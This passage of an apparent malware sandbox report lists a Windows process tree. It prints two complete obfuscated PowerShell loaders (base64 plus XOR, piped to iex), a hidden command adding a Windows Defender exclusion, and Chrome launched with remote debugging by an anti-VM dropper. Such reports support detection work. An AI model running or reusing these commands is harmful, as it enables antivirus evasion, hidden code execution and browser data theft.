                                    "powershell" -EncodedCommand JABoAHAAcgBmAGQAZAB5AGoAPQAnAGYAUgBFAGQAUgBTADUAMQBEADAAYwBTAGYAbAA4AEUAZgBoADEAdgBTAFIAZwBjAEMAMABZAFQAQwBtAEYAYwBWAFEAcABxAGUAaABWADYAQwAwAEkAVABWAEYAOABBAFUAZwBwAHEAZgB5AHgAQQBLAFEAWQBwAEMAMQA5AEgAYgBnADQAbwBXAHgAawBmAEsAUQBZAHEAZgBnAG8ARABWAEcAawB6AFIAUgBWADYAYwBFAE0AUgBZAFcARQBGAGIAdwAwAHcARwBCADAAZgBFADAATQBoAEMAbQBWAEoAVgBEAFEASgBXAHkAdAB1AEkAZwBNADgAVQBnAFoAWQBWAFEANABLAEcAUQBCAFUARgB3AE0AVABjAFUATgBCAGYAaAAxAHYAUwBSADAAZgBFADAATQA4AGIAMwAxAGEAVgBoADQASgBSAFMAdAA2AFAAUgA4AHEAZgAyAEYAWQBWAEcAcwBzAFMAUwBsAHUAQgB5AGMAcQBiAGsAdABjAGIAbQBvAE8AVwBoAHMAZgBEAHcASQBxAGIAbgAwAEEAZgBoAHAAdQBhAEMAcABsAEIAeABzAFMAVgBHAEYAaABWAEQAUgBtAFcAUgBWADEARAAwAE0AVgBhAG4ARgBsAGIAZwBFAFIAWABCAHAAcQBBADAATQBSAGUAbgBKAEUAWQBRADUAcQBYAGkAeAAxAEUAeAA4AC8AUQAwAEIAYgBVAHgANAB6AFEAaQA1AFUAQgBFAG8ANQBmAEEAWgBjAFUAeQBCAHUAZgBoAFoAQQBOAFIAOABwAEMAbQBKAFgAWQBtAG8AegBWAEMAdABxAEUAdwBjADgAVgBYAGwAWQBWAFQAUQBOAFcAQwAxADUATgBrAFEANgBmAGsATgBFAFYAQgA0AEcAUwBSADkAKwBCAEIAZwBTAFYAMgBWAEQAVgBSADAAcwBHAFEAVgBxAEwAUgA0AHEAVgAwAE4ARQBVAHkAQQBlAEYAdwBaAHUARgB3AFkAVQBiAGsAdABEAGUAQwBNAHMAUgBTAHgAcQBGAHcAbwBWAGYAbgBsAEoAZgBoADEAdgBTAFEAVgBxAGMARQBJAFMAZgBrAFEASABlAEcAbwA3AFEAUwA1ADYAUABSADgANQBlAGwAUgBiAFYAZwBFAGQARwBDADUARQBjAEQAYwBTAEMAbQBWAEYAVQB4AG8AZQBXAGgAVQBlAEYAQgBRADkAZQBuAEoARQBiAGcANQBxAFIAUQBaAHUAZABBAFkAUwBDAG0ASgBYAGYAUgA0AHYAVwBpAHgAcQBIAEEATQA1AGMAVQBBAEgAZgBSADQAMwBRAHgAVgBEAE4AUQBjAFUAUQBIAEkASgBmAGgAbwBOAFgAaQB4AGwATgBRAEkAbgBRAEcARQBBAFYAZwA0AEoAWABBAE4ARwBjAEIAOABWAGMAVwBKAGYAZQBoAG8AbwBTAFEAVgBxAEsAUQBRAFYAVgBGAHgARgBaAG0AdABtAEgAeQAxAEQARgBBAE0AbwBiAFUAQQBIAGYAUgBFADcAUgBTAHAANgBLAFEAbwBwAEMAbAB0AGIAZgBoADEAdgBTAFIAMABmAEUAMABNADgAYgAzADEAYQBWAGgANABKAFIAUwB0ADYAUABSADgAcQBmADIARgBZAFYARwBzAHMAUwBRAE4ANwBGAHgAcwBUAEMAMABkAGgAYgBnAEUATgBRAFEAWgB1AEYAeAB3AHEAVgBHAGsARwBWAFEARQA4AEcAUQBBAGYASwBSADQANQBlAGwAUgBiAFUAMgBzAE4ARwB5ADUAMQBEAHgAawBWAGYAbQBKAEYAWgBtAHQAbQBIAHkAMQBEAEYAQgBRADgAYgBsAGMAQQBmAGgAMABlAFgAZwBaAGwATgBrAFEANgBmAGsATgBFAFYAQgA0AEcAUwBSADkAKwBCAEIAZwBVAEMAMgBFAEYAVgBnAEUAVgBSAEMAcABxAEYAeABFADYAYwBXAEYAQQBiAFEANABzAFcAeAB0AEEARQAwAGMAVQBlAGwAUgBIAGUAeABvAGUAUgBTAHMAZgBGADAAWQBSAFkAWABsAGEAVQBoADQATwBXAHgANABmAGYARQBJAFMAVgAyAEoAQQBiAHcAMABzAEcAUQBWAGwAQgB4AGcAVABWADEAdABaAFYARABBAGUARgB3AFoAcQBLAFIANAA1AGUAbABSAGIAVgBqAFIAdQBXAFIAVgBFAGMARABZAHEAWQBYADEAYQBWAEQAUQB6AFcAUwB0AHEASwBRAFUAUwBVAEYAaABYAFUAaQBBAGUAUgBTADUAQQBkAEEAUQBxAFUAQQBaADEAYgBRAEUAUgBSAEMAeABBAEsAUQBRAFUAZgBsADkARwBWAFQAQQBkAEYAdwBaAHEARQB3AEEAVABDADIAWgBYAFUAaQBBAGUAUQBIAHQAYwBCAGoASQA2AFEASABFAEoAZQBDAE0AcgBGAHcAWgBxAEUAdwBBAFQAQwAyAFoAWABVAGkATQBzAFIAUwA1ADEAQgAwAFUAUgBVAEgASQBKAGYAaABvAE4AWABpAHgAbABOAFEASQA1AGMAVQBSAFgAWQBXAHMAMwBRAGkAeABBAEUAQQBjAGsAQwAzAGwAQgBiAFEANABSAEgAZwBaAGwATgBoAFEANgBmAHcAdABYAGUAdwA1AHEAUQBnAFoAdQBGAHgAdwBxAFYARwBrAEcAVgBRAEUAOABTAFMAbAA1AE4AawBRAFcAYgBVAGMASgBlAEcAcwB6AFEAdwBaAHUASQBoAGcAUgBWAEEASgBIAGIAVABBADAAUwBTAHAAWABOAGgAZwBTAGIAawBkAEgAVgBUAGMASgBSAEMANABmAEwAaABRAGcAYQBuAEYALwBiAFEARQA4AFcAaABvAGYAQwB4AHcAcQBiAG0ARQBCAFYAUgA0AEoAUgBSAGwAcQBBAHcAawBSAEMAWABWAGEAVQB4ADQAegBXAEMAMQBFAEIAQQBjAGkAWQBWAHQAYwBiAG0AbwBKAEgAaABWACsAQgBCADAAaABRADAATgBUAFkAUQBFAFIAUQBpAHgARABDAHgAQQBoAGIAbQBGAEUAVgBnADUAcQBUAFIANQAxAEIAdwBRAGkAZgBuAFUAQQBiAGcAOABuAFkAeQAwAGYAQwB4AHMAUwBmADAAdABoAGIAZwA0AFIAWABCAFoANgBJAFIAOABUAEMARQB0ACsAVgBnADQAUgBWAHkAMABlAEMAdwBVAHEAVgAyAEoARgBZAEEANQBtAEgAeQB4AEIAQgB4AHcAUwBDAHcAWgBjAGIAeQBNAFIASABSAFYANgBNAFUAWQBwAFUAMwBaAEgAZQBCADQAVgBSAHkAcwBmAEUAeABBAFMAQwBuAEUAQQBiAHgAOAB6AFcAQwB0ADEARAB5AEkAUgBmAGcAcABGAGIAUQBwAHEAUQBpAHAAcQBFAEIAMAAvAFEAMABCAGIAVQBnADQAVgBHAHkANQA2AEsAUQBvAHEAYQBuAEkASgBmAGgAbwAzAFoAaABWADEARgBBAGMAaQBmAG4AVQBBAGIAUQBvADAAVwB4ADUANgBGAHgAZwBpAGYAbgBVAEYAVgBDAEEANABWAGcAUgArAGMARABZAHAAWQBXAEYAYwBlAHoASQBaAFIAUgBWAG8ATABRAFUAVQBZAFgAbABLAGYAQgAwAGEASABRAFIAKwBjAEQARQBxAGYAbQBGACsAVgBnADUAcQBIAHkAdABxAEUAdwBrADcAZgBYADUASwBmAEEAMABzAEcAUQBWAGwATgBRAGMAUgBWAEcAcABYAFoAdwBvAGQAWQBSAFYAMQBKAGcAYwBsAEMAMwAxAGYAYgBRADQATgBIAHkAMQBxAEUAeABnAG0AZgBuAFYASwBWAG0AZwBOAFYAeQA1ADYASQBSADAAcQBZAFgAcABYAGUAdwB3AE4AUgBpADUANgBQAFUAWQA1AGUAZwBKAHkAVQB4AG8AZQBSAFMAcAA2AEQAMABZAFIAYgBsADkASgBiAFEAMABzAEcAUQBWAHEARAB3AFUAcQBmAG0ARgBEAGIAaQBBAGUARgB3AFoAbwBjAEIAOABVAFEAQQBKAGsAYgBtAHMAMwBRAGgAVgBsAEUAdwBBAHEAYgBtAEYAbABiAGcARQBSAFgAQgBwAGwARAB3AE0AUwBWAEgAMQBBAFYAQgA0AFoAWABRAFoAdQBkAEMAVQBUAEMAMgBWAEoAWgBBADQATwBTAFEAVgBsAEIAeABnAFIAWQBYAGsARQBWAFIANAB6AEcAZwBaAHUAZABEADQAUwBDADEAZABHAFYAVABVAE4ARwB5AHgAcQBFAEIAUQBqAGIAZwBZAEEAYgBRAEUAVgBSAGgAWQBlAEYAdwBNAFUAVgBHAFoAWABlAHcAOABWAEgAeQAxAEcAUABSADgAVQBWAEcAVgBEAGYAaAB3ADMAWABoAFUAZgBMAFIAOABUAEMAbQBJAEgAZQBDAEEATgBYAHkAeAA2AGMARQBBAFYAVQBIAEkASgBmAGgAeABxAFEAaQB0AFUAZABDAGMAcABDADEAdABjAGIAUgBFAEoAWABSAFYANgBGAHkAWQBwAFkAWAAxAEMAWQBtAHMASgBIAGkAdABxAEsAUQBZAHEAQwBuADEAawBiAFEARQBPAFMAUQBOADQAQQB3AEEAUwBmAGcAbwBEAFkAbQBvAE4AUgBpAHgARABGAHoAawBxAFUAZwBwAEYAWgBqAFEAWgBIAGkAdABxAEUAdwBvAFIAYgBtAFYASwBmAGgAcAB1AGEAeQAwAGYAYwBFAE0AbABDAG0ARgBHAFYAQgB3AHoAUQB4ADAAZgBmAEEATQBTAFYARgBkAGcAVgBUAEkAVgBSAGkAdABsAEYAeAA4AFQAVgBGADkAYwBWAEMAQQBlAFcAaABvAGUARgB4AHMAVABWADIARgBvAFYAaAA0AEoAVwB4ADUAMQBIAHgAcwBSAGIAawB0AFkAYgBqAFEAbgBRAGcAWgB1AGQARABvAFIAYgBtAEYAYgBiAFEANQByAEcAUQBCAFUARgB3AEkAVABiAGcAWQBEAFUAagBCAHEAYQBDAHAAcQBFAHgAawBVAFkAVwBGAEEAVgBXAHQAcQBlAHkANQA2AGQAQgA4AGsAZgBsADkARQBWAGcARQBPAFMAUgA5ACsAQgBCADAAbABmADIASgBIAFkAaQBBADgARwBRAEIAVQBGAHcASQBUAGIAZwBZAEQAVQBqAEIAcQBiAEMAMQBxAFAAUQBVAFUAQwBWAHQAWQBWAEQAUQBOAGUAeABWADEARAB3AGMAUgBiAGcAWgBZAFUAeAA0AEsAUwBSADkAKwBCAEIAZwBxAFYASABWAEQAVgBHAHMASwBHAFEAQgBVAEYAdwBJAFQAYgBnAFkARABVAGoAQgBxAGYAUgBWADEAQwAwAE0AcABZAFgAawBBAFoAQQA1AHEASABoAFYAMQBEADAARQBwAGIAawBSAFgAWgB3AG8AZQBRAEIAcAByAEYAQQBrADkAZgBBAE4AZQBlAEMATQBzAFIAUwA1AEQAQQB3AFkAVQBDAGwAeABGAFkAagBRAEoAVgBDAHQAcQBBAHcAbwBVAGYASAAxAEcAVQB3ADUAcQBIAGcAWgBwAGQAUgBRACsAZgBWAFEASABlAEMAQQBOAFgAeQB4ADYAYwBFAEEAVgBVAEEAWgBrAFUAeAA0AFoAVgB5AHQAcgBJAFIAdwBxAGIAZwBaAHkAVQB6AFEAWgBYAGkAMQBxAEEAeABvAFMAZgBtAFoAWABaAHcAbwBlAFIAUwB0AGwARAAwAEkAcQBiAFUAQQBIAGYAUgA0AHYAVgBpADEARABJAFUAVQA4AFYAVgBkAFkAVgBtAHMASgBlAHkAMABjAEQAMABJAFMAVQBIAEkASgBmAGgAbwBOAEgAaQB4AEQARQB4ADgALwBRADAAQgBiAFYAagBjAFoAVwB5AHMAZQBLAGcAWQBoAGIAawB0AEQAVgBXAG8ANwBhAHgAVgA2AGQAQgBzAFMAVgBHAEYAawBVAHgANABaAFYAeQB0AHUAQgBFAG8ANQBlAG0ARgBkAGIAZwA0AG4AVgBCAFYANQBOAGsAUQA2AGMAVQBOAEIAVgBnAEUAegBIAFEAWgBwAGQAUgBRADUAVQBHAEoAZgBmAFIANAB2AFcAaQB4AHEASABBAFkAbQBmAG4AVgBLAFYAbQBsAHEAUgBpADEANgBFAEEATgBFAFMASABCAHgAZgBqAE0AcwBHAFIAcABBAEUAeAAwAFIAWQBYADAAQQBiAFEARQBXAFcAaABvAGYAQwB4AHcAcQBiAG0ARQBCAFYAUgA0AEoAUgBSAGwAcQBBAHcAawBSAFEASABKAEUAWgBnADQAUgBIAGkANQA2AGYAQQBZADUAZQBtAEYARQBWAG0AbwBkAFcAeQB0ADYAQwB3AEUAUgBhAG4ASgBFAFkAUgBFAFYAWABoAFUAZgBJAFIAOABUAFUASABKAGIAVQBqAFIAdQBYAHgAVgBFAEIAQQBjAGwAYwBYAGwAQQBWAFQAUQBSAFgAaQB4AHEAQQB3AEEANQBlAG0ARgBaAFYAVwBzAE4AUgBTADEAcQBDAEIAUQA4AGIAMwAxAGMAVQB4AEUATgBYAGkAMQBBAEkAUQBrADUAZQBtAEYAQgBWAEEANQBxAEgAUwBwAEUAQgBBAGMAbQBmAG4AVgBLAFYAbQBsAHEAUgBpADEANgBFAEIAUQA2AGMAVQBOAEIAVgBnAEUAegBIAFEAWgB1AGQAQwBZAHAAWQBYADEAQwBZAGgANABaAEgAaQA1AHUAQgBCAGcAUgBmAG0AbABkAFUAagBSAHUASABRAFoAdQBkAEQAWQBxAFkAWAAxAGEAVgBEAFEAegBXAFMAdABxAEsAUQBVAFMAVQBIAEoAYgBWAEIANABOAFYAeQBwAHEARAB3AG8ANQBlAGcASgAzAFYAVwBvAFYAUgBCAFYANQBOAGsAUQBXAGEAQQA0AE4AJwA7ACQAbAB3AG0AbABxAGYAPQAnADcAWQBfAC4ATwAtAEUAcwBwADkAMwAwACcAOwAkAHUAYQBlAG0APQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABwAHIAZgBkAGQAeQBqACkAOwAkAGsAZABvAHgAZwA9ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAAoAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB1AGEAZQBtAC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAHUAYQBlAG0AWwAkAGkAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AJABsAHcAbQBsAHEAZgBbACQAaQAlACQAbAB3AG0AbABxAGYALgBMAGUAbgBnAHQAaABdAH0AKQApACkAOwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAawBkAG8AeABnACkAKQB8AGkAZQB4AA==
                                    7⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4100
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell" -EncodedCommand $ b u w l q s j d = ' O w 8 Y V w s D b D g h I V Y y J n Y + U g t n B y Y K N l M B K x A + V g s 5 O X o N N l M E E i o c E j F m O T 0 x M h E g J 3 U c E j I T b H k L V Q o + K x B F V w k M B 3 8 w M Q l j I 3 U m V z l n A z M L C D A g F Q Q X F y Q / Y C I K M j N i P j 4 i V g s 5 Y H g N P T Q m O A N A A D p m A 3 o k M y g / E A A m D A w D L S Y y I z Q 9 E n U D A A 4 X F x 4 y M h 4 5 K H Q h E z x m H z s y M i h l O A R B I Q 0 c F y I K C D Q E E i p J E D I M H 3 o N N i Q A K B 8 + F T 0 T E 3 o J J i c h J x B F F w s M A y Y n H x U + K H U E V w w 6 N i 0 4 N i Q a K x 8 T E z x m H z s y M i h l O A E + U g t n B y Y K N l M G K B B F D A p m Z X 0 n H D Q 7 E i o 6 C Q l n P S A h I V Y y O w B F V g o T I n 0 n H D Q 8 E h A c D i E Q Z S 0 i I l N k E w A H U C c t B z w J V h Y 5 K 3 U 2 F S E Q Z S 0 i I l N k E w A H U C d n M S U J M h 4 5 O A Q X D A w M H z 8 M C w p l E w R F I w p n A z 8 M J i c h K 3 Q h A C U X F D 4 x M l M + O A R B E g p n B C 0 i I g I s K C o U F Q 0 T G D o h L R V i O w A 6 H w k D H C 0 4 N i c + F R 8 6 E g w 6 O X o K I x U + K H U E V w w 6 N j 8 8 C D B h F Q Q X E C Q X F C E M P S w g F S k c V w o X Y A 4 K V j A g F Q Q c A y c u J i E L L T Q 6 K x 8 5 A D g H F w I y P T c h J H U + C D I D B 3 s K I j A + J w A 2 H Q k t F D 4 + I i A v E H Y y D w w T M i 0 i I i w t E B A 5 U C d m O S c h J g E + E g 8 i C D I M H D 8 5 V 1 9 k E y k h A C Q D M X o h I S c l O A 8 D U C I T M T M x C A I n F A A 9 A D g H F C E L L T Q 6 K x 8 6 B S I T G z g M L T x m P S x F C w 0 c B C U l J h E y O w 8 y V w k T A z M k D i g j F R B F V y M C Z X 0 n H D Q j E H Q A C z J m E z g h I V Y y E B A p A C M X B y Q L C C w 7 E H Q Y D S Q / B y Y L V y g s E B 8 y V w k D b D 8 j N i R i O A Q i C Q s 5 H y Q J V g 4 / P S w i C w t m G z M J P S R l E B B J E i E c Z S 0 y M h 4 v K x Q y U C E X M y M H L C c 7 O A 9 A U A 4 H F y Y K L S g 5 O A 8 D U C I c A z M K C z x g F Q A H A D g H F C E M P S w g F S k c V w o X F 3 I h I w I 6 K x 8 6 C y Q B b C M J C D A / F Q Q y U C E X B y w h J l c g K x Q x D D E 6 E z o x D C R s P n R A U A 4 A I T o y D C c 6 O w A U H j E 5 M T g N I i s l O A 8 D U C I T P T A L C A 0 y I R Q y K D I M N j 4 9 V y g 6 K x A i V g o T A y E + I i A v E H c 2 D Q w T O T w K D C c h I x 8 Y C z F n A 3 o y N i c 7 I D 0 A B D 4 M G y Y L C y g 2 I B A i E w k D Y C k 5 P S Q i I w A 2 V z E C L Q c K V y g 9 E w E I N j E D G z g x M g I 5 E n Y I K Q k D G z M K V i g j K y k h E j 8 T H z w N I y g i K x A m D Q k S B z w + I j B h F Q J J V T I M H z k x P Q o z P h 8 U C w l n O S M l V y N h K C o 6 V D I C L S E x P T Q 2 J g A 6 E Q 0 S G z 0 y M j A / E A E i E T 4 T A 3 4 M I F 9 n K x 8 6 F D E M P j 8 y P Q 4 5 O z 0 D U C I c F y Y K C A I s O A N A A D w 5 A 3 k k M y g / E A A m D A w D L S Y y I z Q 9 E n U E M g s 5 O S Q y V z A s O A R B J Q w R L T w y V 1 8 g P j 0 D D A s T A z 8 y V i 8 g I w A m F D E M P i 0 4 N i c 7 J A E h H S U S G C Q n H x U + F Q A 6 E w s 5 O T 0 L N i d s O A J F C w w t Z B 4 x V w 4 5 K w 8 m F D I D B x 8 x P S g n J w 8 6 F z J m M S Y L D C c h I B 8 i M w w T E z M M L T A i P j 0 D D A w T H z 4 L C A o i E h R F I j I D L S I N N i d s O A Q U N j 4 Q E w Q i H x V i O w 8 U F D I M G C 0 4 N i Q a K x 8 T E z 1 m G y U y M j R k E w A m D D 4 T E z A J V C Q s E B B F D Q k M F y I K J i c h J x 8 + C w s / O S E h J j R h F Q 8 2 E Q k t F D 4 8 I l 8 7 E 3 V F M g 0 M F y Y h I A o g F Q A m H j E D G 3 o J P T w 5 O A R B N A w D Y A c y P T w 5 E w Q y L g k D M S U y P S h l P j 0 D D A s 6 P X s K M j w 8 O A N A A D w 5 A 3 k k M y g / E A A m D A w D L S Y y I z Q 9 E n U E M z I M B 3 o J M l M 7 E n Y + C w w X F D 4 5 M h 4 m E 3 Q U M w w T E z M M I A o 4 J X V F J D E M B 3 o y P S w l K x 8 9 A C Q B B z w K C z Q B F Q B J E D s D D w I K V w o g K 3 d J E j k 5 E 3 o M I j A s E B A m H S E X Z B 4 M I i A s F Q E U C D I D Y A g M C C A l E w A 2 D g o T A C 0 k M A 4 l K w A i C w o + J n 0 i L S x h F R B B C j E 9 Y A w N I j A / F R 8 i F w p m Y B 8 J M l c 5 J Q A c E w k M B C 0 4 N i c 7 J A E h E D 0 t N n 0 n H D Q s F A 8 m E z I 5 H D 8 5 M h 4 m E 3 Q U L j E M H y E + I j A s E x A c E j E M B y Y h I V Y y O w A q D w o c G y Y n H x U + E i k Y V g o D D y M k C S w 5 E n Q i D w s 6 B w A K C z Q 5 E i k q D w o X F H M h J g I E J w M 1 V j w H N n 0 n H D Q s F A 8 m E z I 5 H D 8 9 C D A v F Q A 2 H g w R G z w M M l N l O A N A A C U A F H 0 n H D Q s F A 8 m E z I 5 H D 8 5 M h 4 m E 3 Q U I j I D Z C I K C D Q B F Q A 2 H g w X F H M h J j Q 4 K B A I H T I A J n 0 i L S x h F R B B C j E 9 Y B 4 M I i A s F Q E U C D I D Y A g M C C A l E w A 2 D g o T A C 0 4 N i c + F Q 8 6 V j I A J n 0 i L S x h F R B B C j E 9 Y B I x M h I 5 J w B J N A w D Y S 0 4 N i c + F Q 8 6 V j I A J n 0 i I h Z g K H Q 2 C j I 5 b S 0 4 N i c 8 O w Q X D D J n H y M y V x J h K D 5 F M j E M G z g 8 C C A h K x Q e D g c d F C M n H x J l E i k b A A 0 u J i E M P S h j K C 4 x X i E S H y Y y V w o v F Q A m H i Q C G y A J I j A + F R A I C z I S B y I L V x U y P R I 2 D Q w T O T w K D C c + E A 8 + H g k H F D 4 + L S w l K 3 U U C w s 9 F w s j J j Q i K x B F C Q s 9 I i 0 i L T Q 8 E x 8 6 F w s c E D o h J l c E E i o c E j F m O T 0 x M h E y O w 8 U F D I M G C 0 k M y g 5 F Q 8 i F w o 5 M T A h J j Q s F A 8 m E z I 5 H C 0 k M z Q 9 E n U E K D E D Z C Y h J j Q k F B A + H z I 5 D z w h J l c A K B 8 + F T 0 T E 3 o J J i c + K C k 2 F z E 9 F D 4 6 I j A v K H Q 6 F w s c B z o K V 1 I y O w B J F Q 0 5 A y Q x M h U y P R I q E Q s 5 G y Y n H x I l K y 4 x C C I c A z A N C C 8 l O A 8 D A D I M P T o M J i c i O A 9 A A D I D L T A y N i R i O A A m U w k M B C 0 l N i R s P n R A A D F m E 3 o x V w E y F D 4 y C w 0 T O X o h I S M y F x M E X i d m A 3 4 J P T c y P B Z N W g = = ' ; $ f n b r u z a = ' q G p g h T U J h e f U ' ; $ b q r n y = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ b u w l q s j d ) ; $ a x o i b l = ( [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( $ ( f o r ( $ i = 0 ; $ i   - l t   $ b q r n y . L e n g t h ; $ i + + ) { $ b q r n y [ $ i ] - b x o r [ b y t e ] $ f n b r u z a [ $ i % $ f n b r u z a . L e n g t h ] } ) ) ) ; [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ a x o i b l ) ) | i e x 
                                    7⤵
                                      PID:5904
                                • C:\Users\Admin\AppData\Local\Temp\10126710101\packed.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10126710101\packed.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Enumerates system info in registry
                                  PID:2596
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    PID:6948
                                • C:\Users\Admin\AppData\Local\Temp\10126720101\bncn6rv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10126720101\bncn6rv.exe"
                                  5⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Downloads MZ/PE file
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Loads dropped DLL
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Checks processor information in registry
                                  PID:4196
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                    6⤵
                                    • Uses browser remote debugging
                                    • Enumerates system info in registry
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5136
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff9a54cc40,0x7fff9a54cc4c,0x7fff9a54cc58
                                      7⤵
                                        PID:5432
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2244,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2240 /prefetch:2
                                        7⤵
                                          PID:6404
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1836,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2584 /prefetch:3
                                          7⤵
                                            PID:4928
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2032,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2676 /prefetch:8
                                            7⤵
                                              PID:5752
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
                                              7⤵
                                              • Uses browser remote debugging
                                              PID:6288
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:1
                                              7⤵
                                              • Uses browser remote debugging
                                              PID:6644
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4464,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:1
                                              7⤵
                                              • Uses browser remote debugging
                                              PID:5888
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4196 /prefetch:8
                                              7⤵
                                                PID:7060
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
                                                7⤵
                                                  PID:7012
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3648,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:8
                                                  7⤵
                                                    PID:4572
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
